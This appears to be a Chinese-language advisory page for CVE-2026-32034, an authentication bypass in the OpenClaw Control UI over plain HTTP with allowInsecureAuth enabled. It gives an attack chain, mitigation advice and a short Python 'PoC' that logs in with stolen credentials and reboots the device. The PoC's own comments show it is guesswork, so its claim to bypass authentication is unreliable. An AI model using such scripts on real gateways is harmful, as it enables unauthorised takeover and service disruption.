IPBUF安全漏洞报告
English
CVE-2026-32034 CVSS 8.1 高危

CVE-2026-32034 OpenClaw控制UI认证绕过漏洞

披露日期: 2026-03-19
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32034
漏洞类型
认证绕过
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

认证绕过OpenClawHTTP高危漏洞

漏洞概述

OpenClaw 2026.2.21 之前的版本在 Control UI 中存在认证绕过漏洞。当网关暴露在明文 HTTP 上并显式启用 allowInsecureAuth 时,攻击者可绕过设备身份和配对验证。利用该漏洞,攻击者可通过拦截或泄露的凭证获取高权限访问权限。

技术细节

该漏洞源于 OpenClaw 在特定配置下的安全逻辑缺陷。当目标系统的网关通过明文 HTTP 协议暴露,且管理员显式启用了 `allowInsecureAuth` 配置项时,控制 UI 的认证机制被削弱。此时,系统未能对未加密通道上的请求强制执行严格的设备身份验证和配对流程检查。攻击者可利用该缺陷,结合获取到的用户凭证(通过网络嗅探或日志泄露获取),直接构造 HTTP 请求发送至控制接口。由于缺乏加密传输和强认证约束,攻击者能够成功绕过身份验证环节,获取高权限的设备控制能力,进而对系统进行恶意操作,严重影响系统的完整性和可用性。

攻击链分析

STEP 1
信息收集
攻击者扫描网络,发现通过 HTTP 协议(80端口)暴露的 OpenClaw 网关服务。
STEP 2
凭证获取
攻击者通过网络嗅探、中间人攻击或利用其他泄露途径获取有效的用户凭证。
STEP 3
发送攻击请求
攻击者利用获取的凭证,向目标网关的 Control UI 发送未加密的 HTTP 请求。
STEP 4
绕过认证
由于 allowInsecureAuth 开启且未强制加密,系统接受请求并建立高权限会话。
STEP 5
执行恶意操作
攻击者获得控制权,可修改配置、中断服务或执行其他破坏完整性和可用性的操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://<target-ip>/api/control" username = "admin" password = "<leaked-or-intercepted-password>" # Exploit the authentication bypass over HTTP # Since allowInsecureAuth is enabled and transport is HTTP, # standard authentication grants high privileges. session = requests.Session() # Login payload or direct auth header depending on implementation # Assuming a cookie-based or token-based auth flow that is vulnerable payload = { "username": username, "password": password } try: # Send authentication request response = session.post(target_url + "/login", data=payload, verify=False) if response.status_code == 200: print("[+] Authentication bypass successful!") print("[+] Accessing Control UI...") # Example action: Reboot device action_response = session.post(target_url + "/reboot") print("[+] Device reboot status:", action_response.status_code) else: print("[-] Failed to bypass authentication") except Exception as e: print(f"Error: {e}")

影响范围

OpenClaw < 2026.2.21

防御指南

临时缓解措施
建议立即检查并禁用 `allowInsecureAuth` 配置,确保仅在 HTTPS 环境下提供服务,并尽快应用官方补丁升级系统。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表